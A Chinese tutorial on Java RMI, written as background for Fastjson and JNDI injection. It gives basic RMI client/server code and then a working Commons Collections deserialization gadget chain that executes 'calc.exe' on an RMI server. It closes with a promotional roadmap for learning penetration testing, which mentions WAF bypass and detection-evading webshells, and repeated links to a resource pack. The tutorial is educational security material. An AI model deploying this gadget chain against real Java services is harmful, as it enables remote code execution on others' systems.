反序列化RMI分析

前言

在分析Fastjson漏洞前，需要了解RMI机制和JNDI注入等知识点，所以本篇文来分析一下RMI机制。

在Java里面简单来说使用Java调用远程Java程序使用的就是RMI，调用C的程序调用的是JNI，调用python程序使用到的是Jython。RMI、JNI、Jython，其实在安全中都能发挥比较大的作用。
JNI在安全里面的运用就比较大了，既然可以调用C语言，那么后面的… …自行脑补。这个暂且忽略不讲，后面再说。

如果使用或了解过Python编写burp的插件的话，对这个Jython也不会陌生，如果说Python的插件就需要安装一个Jython的jar包。这个后面再说。这里主要讲RMI，该机制会在反序列化中频繁运用，例如Weblogic的T3协议的反序列化漏洞。

** 概念**

Rmi：远程方法调用， JRMP：Java远程消息交换协议。这是运行在Java RMI之下、TCP/IP之上的线路层协议。
该协议要求服务端与客户端都为Java编写，就像HTTP协议一样，规定了客户端和服务端通信要满足的规范。

JNDI :Java命名和目录接口（the Java naming and directory
interface，JNDI）是一组在Java应用中访问命名和目录服务的API。命名服务将名称和对象联系起来，使得读者可以用名称访问对象。
目录服务是一种命名服务，在这种服务里，对象不但有名称，还有属性。

** Rmi作用**

Rmi为远程方法调用，是允许在一个java虚拟机的对象调用另一个java虚拟器的方法，这俩个虚拟机可以在一台计算机的不同进程中，也可在不同网络的计算机中

** Rmi三个关键部分**

Registry: 注册表，存放着远程对象的位置(ip,端口) client: 调用远程的对象 Server: 提供远程的对象

** Rmi基础运用**

前面说过RMI可以调用远程的一个java对象

package RmiStudyOne;
import RmiStudyOne.HelloInterface;
import java.rmi.NotBoundException;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
public class Client {
public static void main(String[] args) throws RemoteException, NotBoundException {
//获取远程主机对象
Registry registry = LocateRegistry.getRegistry("127.0.0.1",1099);
//利用注册表的代理去获取远程注册表中名为hello的对象
HelloInterface helloInterface = (HelloInterface) registry.lookup("test");
//调用远程方法
System.out.println(helloInterface.say("1234"));
}
}

server代码

package RmiStudyOne;
import java.rmi.AlreadyBoundException;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
//注册远程对象
public class Server {
public static void main(String[] args) throws RemoteException, AlreadyBoundException {
//创建远程对象
HelloInterface helloservice = new HelloImpl();
//创建注册表
Registry registry = LocateRegistry.createRegistry(1099);
//绑定ip,默认是127.0.0.1
System.setProperty("java.rmi.server.hostname","127.0.0.1");
//绑定远程对象到注册表李，并且命名为Hello
registry.bind("test",helloservice);
}
}

helloimpl

package RmiStudyOne;
import RmiStudyOne.HelloInterface;
import java.rmi.RemoteException;
import java.rmi.server.UnicastRemoteObject;
public class HelloImpl extends UnicastRemoteObject  implements HelloInterface {
public HelloImpl() throws RemoteException {
super();
System.out.println("构造方法");
}
public String say(String name) throws RemoteException {
return "test"+name;
}
}

hellointerface

package RmiStudyOne;
import java.rmi.Remote;
import java.rmi.RemoteException;
//创建接口，必须继承Remote
public interface HelloInterface extends Remote {
//每个函数必须抛出RemoteException异常
String say(String name) throws RemoteException;
}

RMi触发反序列示例

Client

package RmiStudyTwo;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.rmi.Naming;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.util.HashMap;
import java.util.Map;
public class client {
public static void main(String[] args) throws Exception {
Registry registry =  LocateRegistry.getRegistry("127.0.0.1",1099);
User user = (User)registry.lookup("user");
user.work(getpayload());
//另一种写法
//        String url = "rmi://192.168.20.130:1099/user";
//        User userClient = (User) Naming.lookup(url);
//        userClient.work(getpayload());
}
public static Object getpayload() throws Exception{
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"})
};
Transformer transformerChain = new ChainedTransformer(transformers);
Map map = new HashMap();
map.put("value", "sijidou");
Map transformedMap = TransformedMap.decorate(map, null, transformerChain);
Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
ctor.setAccessible(true);
Object instance = ctor.newInstance(Retention.class, transformedMap);
return instance;
}
}

server

package RmiStudyTwo;
import java.rmi.AlreadyBoundException;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
public class Server {
public static void main(String[] args) throws RemoteException, AlreadyBoundException {
User user = new UserImpl();
Registry registry = LocateRegistry.createRegistry(1099);
registry.bind("user",user);
System.out.println("Rmi://127.0.0.1:1099");
}
}

user

package RmiStudyTwo;
import java.rmi.Remote;
import java.rmi.RemoteException;
//远程接口类
public interface User extends Remote {
public String hello(String hello)throws RemoteException;
void work(Object object) throws  RemoteException;
void say() throws RemoteException;
}
userimpl
package RmiStudyTwo;
import java.rmi.RemoteException;
import java.rmi.server.UnicastRemoteObject;
public class UserImpl extends UnicastRemoteObject  implements User{
protected UserImpl() throws RemoteException {
super();
}
public String hello(String hello) throws RemoteException {
return "hello function";
}
public void work(Object object) throws RemoteException {
System.out.println("work方法被调用");
}
public void say() throws RemoteException {
System.out.println("say方法调用");
}
}

学习网络安全技术的方法无非三种:

第一种是报网络安全专业，现在叫网络空间安全专业，主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习，多媒体技术，信息检索、舆情分析等。

第二种是自学，就是在网上找资源、找教程，或者是想办法认识一-些大佬，抱紧大腿，不过这种方法很耗时间，而且学习没有规划，可能很长一段时间感觉自己没有进步，容易劝退。

如果你对网络安全入门感兴趣，那么你需要的话可以点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！

第三种就是去找培训。

接下来，我会教你零基础入门快速入门上手网络安全。

网络安全入门到底是先学编程还是先学计算机基础？这是一个争议比较大的问题，有的人会建议先学编程，而有的人会建议先学计算机基础，其实这都是要学的。而且这些对学习网络安全来说非常重要。但是对于完全零基础的人来说又或者急于转行的人来说，学习编程或者计算机基础对他们来说都有一定的难度，并且花费时间太长。

第一阶段：基础准备 4周~6周

这个阶段是所有准备进入安全行业必学的部分，俗话说：基础不劳，地动山摇

第二阶段：web渗透

学习基础 时间：1周 ~ 2周：

① 了解基本概念：（SQL注入、XSS、上传、CSRF、一句话木马、等）为之后的WEB渗透测试打下基础。
② 查看一些论坛的一些Web渗透，学一学案例的思路，每一个站点都不一样，所以思路是主要的。
③ 学会提问的艺术，如果遇到不懂得要善于提问。

配置渗透环境 时间：3周 ~ 4周：

① 了解渗透测试常用的工具，例如（AWVS、SQLMAP、NMAP、BURP、中国菜刀等）。
② 下载这些工具无后门版本并且安装到计算机上。
③ 了解这些工具的使用场景，懂得基本的使用，推荐在Google上查找。

渗透实战操作 时间：约6周：

① 在网上搜索渗透实战案例，深入了解SQL注入、文件上传、解析漏洞等在实战中的使用。
② 自己搭建漏洞环境测试，推荐DWVA，SQLi-labs，Upload-labs，bWAPP。
③ 懂得渗透测试的阶段，每一个阶段需要做那些动作：例如PTES渗透测试执行标准。
④ 深入研究手工SQL注入，寻找绕过waf的方法，制作自己的脚本。
⑤ 研究文件上传的原理，如何进行截断、双重后缀欺骗(IIS、PHP)、解析漏洞利用（IIS、Nignix、Apache）等，参照：上传攻击框架。
⑥ 了解XSS形成原理和种类，在DWVA中进行实践，使用一个含有XSS漏洞的cms，安装安全狗等进行测试。
⑦ 了解一句话木马，并尝试编写过狗一句话。
⑧ 研究在Windows和Linux下的提升权限，Google关键词：提权

以上就是入门阶段

第三阶段：进阶

已经入门并且找到工作之后又该怎么进阶？详情看下图

给新手小白的入门建议：
新手入门学习最好还是从视频入手进行学习，视频的浅显易懂相比起晦涩的文字而言更容易吸收，这里我给大家准备了一套网络安全从入门到精通的视频学习资料包免费领取哦！

如果你对网络安全入门感兴趣，那么你需要的话可以点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！